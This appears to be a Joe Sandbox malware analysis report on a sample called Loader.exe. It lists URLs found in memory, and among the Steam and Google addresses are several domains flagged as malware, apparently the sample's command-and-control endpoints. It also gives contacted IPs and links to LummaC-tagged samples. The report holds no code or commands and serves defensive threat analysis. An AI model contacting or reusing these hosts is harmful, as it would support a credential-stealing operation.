https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://player.vimeo.com	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz/	Loader.exe, Loader.exe, 00000000.00000003.1775134722.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz/pi	Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/subscriber_agreement/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deafeninggeh.biz/	Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wrathful-jammy.cyou/api	Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.valvesoftware.com/legal.htm	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://awake-weaves.cyou/api#)	Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://diffuculttan.xyz/api	Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://s.ytimg.com;	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/	Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/points/shop/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/	Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz:443/api	Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/api=(#	Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://immureprech.biz/api;	Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/;	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/api6(8	Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz/apij	Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://medal.tv	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	Loader.exe, 00000000.00000003.1850474497.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850362286.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140057200.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140265503.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz/l#	Loader.exe, 00000000.00000003.1752403275.0000000000699000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900l	Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	Loader.exe, 00000000.00000003.1839971133.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850337869.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1839971133.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.3.dr	false		high
https://effecterectz.xyz/	Loader.exe, 00000000.00000003.1800647255.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800804536.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/	Loader.exe, 00000000.00000003.1840010079.000000000066F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/T#	Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/apio	Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.22.222	immureprech.biz	United States	13335	CLOUDFLARENETUS	false
104.21.32.1	deafeninggeh.biz	United States	13335	CLOUDFLARENETUS	true
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574897
Start date and time:	2024-12-13 18:51:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@10/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.53.18, 172.202.163.200, 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Loader.exe, PID 4308 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Loader.exe

Simulations

Behavior and APIs

Time	Type	Description
12:52:06	API Interceptor	8x Sleep call for process: Loader.exe modified
12:52:45	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.22.222	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse
	adv.ps1	Get hash	malicious	LummaC	Browse
	http://gerxx.ru	Get hash	malicious	Unknown	Browse
